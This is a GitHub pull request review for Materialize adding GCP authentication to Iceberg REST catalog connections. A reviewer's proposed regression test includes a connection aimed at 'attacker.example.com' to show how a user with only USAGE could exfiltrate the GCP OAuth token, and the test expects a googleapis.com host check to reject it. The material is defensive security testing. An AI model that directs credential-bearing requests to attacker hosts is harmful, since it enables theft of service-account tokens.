[SS-69] Iceberg catalog/sink can use a GCP connection #36695
Merged
def-
reviewed
May 27, 2026
Comment on lines +971 to +974
retry:
  automatic:
    - exit_status: 1
      limit: 1
Contributor
Why auto-retry? Do we expect it to be flaky?
Contributor
Author
I don't expect it to be flaky. I'll turn off retries.
patrickwwbutler
approved these changes
Jun 2, 2026
def-
reviewed
Jun 3, 2026
def-
left a comment
Contributor
How worried are we about someone being able to exfiltrate the GCP OAuth2 access token? I would argue we should be quite worried and only allow passing it to actual GCP URLs. Currently this works:
diff --git a/test/iceberg/gcp-connection-validation.td b/test/iceberg/gcp-connection-validation.td
new file mode 100644
index 0000000000..a3a4435bf2
--- /dev/null
+++ b/test/iceberg/gcp-connection-validation.td
@@ -0,0 +1,41 @@
+# Copyright Materialize, Inc. and contributors. All rights reserved.
+#
+# Use of this software is governed by the Business Source License
+# included in the LICENSE file at the root of this repository.
+#
+# As of the Change Date specified in that file, in accordance with
+# the Business Source License, use of this software will be governed
+# by the Apache License, Version 2.0.
+
+# Regression test for SS-69: an Iceberg REST catalog connection that
+# authenticates with a GCP connection must only send its reusable, broadly-
+# scoped bearer token to a Google-operated host. Without a plan-time host check,
+# a principal with only USAGE on the GCP connection can aim the catalog URL at a
+# host they control and exfiltrate the service-account token.
+
+# Disable default validation so the accepted case below doesn't connect; the
+# host check is enforced at plan time, independent of validation.
+$ postgres-execute connection=postgres://mz_system:materialize@${testdrive.materialize-internal-sql-addr}
+ALTER SYSTEM SET enable_default_connection_validation = false
+
+> CREATE SECRET gcpsa AS 'dummy'
+
+> CREATE CONNECTION gcpconn TO GCP (SERVICE ACCOUNT KEY = SECRET gcpsa)
+
+# Exploit: a non-Google catalog host must be rejected before any token is sent.
+! CREATE CONNECTION evil TO ICEBERG CATALOG (
+ CATALOG TYPE = 'rest',
+ URL = 'https://attacker.example.com/iceberg/v1/restcatalog',
+ GCP CONNECTION = gcpconn,
+ WAREHOUSE = 'gs://anything'
+ )
+contains:must point URL at a *.googleapis.com host
+
+# Positive control: a real BigLake host is accepted, so the allowlist doesn't
+# break the feature.
+> CREATE CONNECTION biglake TO ICEBERG CATALOG (
+ CATALOG TYPE = 'rest',
+ URL = 'https://biglake.googleapis.com/iceberg/v1/restcatalog',
+ GCP CONNECTION = gcpconn,
+ WAREHOUSE = 'gs://anything'
+ )
diff --git a/test/iceberg/mzcompose.py b/test/iceberg/mzcompose.py
index 78aa241741..990848d1fb 100644
--- a/test/iceberg/mzcompose.py
+++ b/test/iceberg/mzcompose.py
@@ -80,6 +80,22 @@ def workflow_smoke(c: Composition) -> None:
)
+def workflow_gcp_connection_validation(c: Composition) -> None:
+    """Regression test for SS-69: an Iceberg REST catalog connection that
+    authenticates with a GCP connection must only target Google-operated catalog
+    hosts. A GCP access token is a reusable, broadly-scoped bearer credential
+    with no audience binding, so before this validation a principal with only
+    USAGE on a GCP connection could point the catalog URL at an attacker host and
+    exfiltrate the connection's service-account token. This exercises connection
+    planning only and needs no Iceberg backend."""
+    c.down(destroy_volumes=True)
+    c.up("materialized")
+
+    c.run_testdrive_files(
+        "gcp-connection-validation.td",
+    )
+
+
 def workflow_mode_append(c: Composition) -> None:
     key = _setup(c)

and allows someone with only USAGE on the GCP connection object to send the OAuth token to attacker.example.com.
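
For illustration, the kind of plan-time host check the test above expects could look roughly like the following. This is a minimal sketch, not the code in this PR: the function name `is_google_catalog_url`, the single `.googleapis.com` suffix (taken from the error message in the test), and the https-only requirement are all assumptions.

```python
from urllib.parse import urlsplit

# Assumption: the only allowed suffix is the one named in the test's
# expected error message ("must point URL at a *.googleapis.com host").
ALLOWED_HOST_SUFFIX = ".googleapis.com"


def is_google_catalog_url(url: str) -> bool:
    """Return True only for https URLs whose host is a subdomain of googleapis.com.

    Hypothetical helper: the name and the https-only rule are assumptions.
    """
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        # Malformed authority component (for example, a bad IPv6 literal).
        return False
    if parts.scheme != "https" or host is None:
        return False
    # `hostname` is already lowercased and excludes userinfo and port;
    # drop a trailing root dot before comparing.
    host = host.rstrip(".")
    # Require a real label in front of the suffix, so "evilgoogleapis.com"
    # and the bare suffix itself are both rejected.
    return host.endswith(ALLOWED_HOST_SUFFIX) and len(host) > len(ALLOWED_HOST_SUFFIX)


if __name__ == "__main__":
    for candidate in (
        "https://biglake.googleapis.com/iceberg/v1/restcatalog",
        "https://attacker.example.com/iceberg/v1/restcatalog",
        "https://biglake.googleapis.com@attacker.example.com/",
    ):
        print(candidate, is_google_catalog_url(candidate))
```

Comparing the parsed hostname rather than the raw URL string matters here: a substring or prefix match on the URL would accept hosts such as `googleapis.com.attacker.example.com` or a URL that hides the real host behind a userinfo component.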
resolve conflicts in xl (Iceberg REST + GCP): union import list + biglake parser test + GCP keyword
In this PR:
iceberg-rust RequestAuthenticator using gcp_auth

N.B. GCP BigLake doesn't perform Iceberg maintenance yet, so long-running Iceberg sinks will fail when the table metadata grows too large.
(ref: https://cloud.google.com/blog/products/data-analytics/improved-interoperability-for-your-apache-iceberg-lakehouse)

Stacked on #36694.
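
Conceptually, a request authenticator like the one described above attaches a bearer token to each outgoing catalog request and refreshes it before it expires. The sketch below illustrates that idea only. It does not reproduce the iceberg-rust or gcp_auth APIs: `BearerAuthenticator`, `TokenFetcher`, and the 60-second refresh margin are all hypothetical.

```python
import time
from typing import Callable, Dict, Optional, Tuple

# Hypothetical token source: returns (access_token, expiry as a Unix timestamp).
TokenFetcher = Callable[[], Tuple[str, float]]


class BearerAuthenticator:
    """Adds an Authorization header, caching the token until it nears expiry."""

    def __init__(self, fetch_token: TokenFetcher, refresh_margin_secs: float = 60.0):
        self._fetch_token = fetch_token
        self._refresh_margin_secs = refresh_margin_secs
        self._token: Optional[str] = None
        self._expires_at = 0.0

    def authenticate(
        self, headers: Dict[str, str], now: Optional[float] = None
    ) -> Dict[str, str]:
        now = time.time() if now is None else now
        # Fetch a token on first use, or when the cached one is within the
        # refresh margin of its expiry.
        if self._token is None or now >= self._expires_at - self._refresh_margin_secs:
            self._token, self._expires_at = self._fetch_token()
        # Return a copy so the caller's header map is left unmodified.
        out = dict(headers)
        out["Authorization"] = f"Bearer {self._token}"
        return out
```

Because the token is a bearer credential, anything that receives the `Authorization` header can reuse it, which is why the review thread asks for the destination host to be validated before the authenticator is ever invoked.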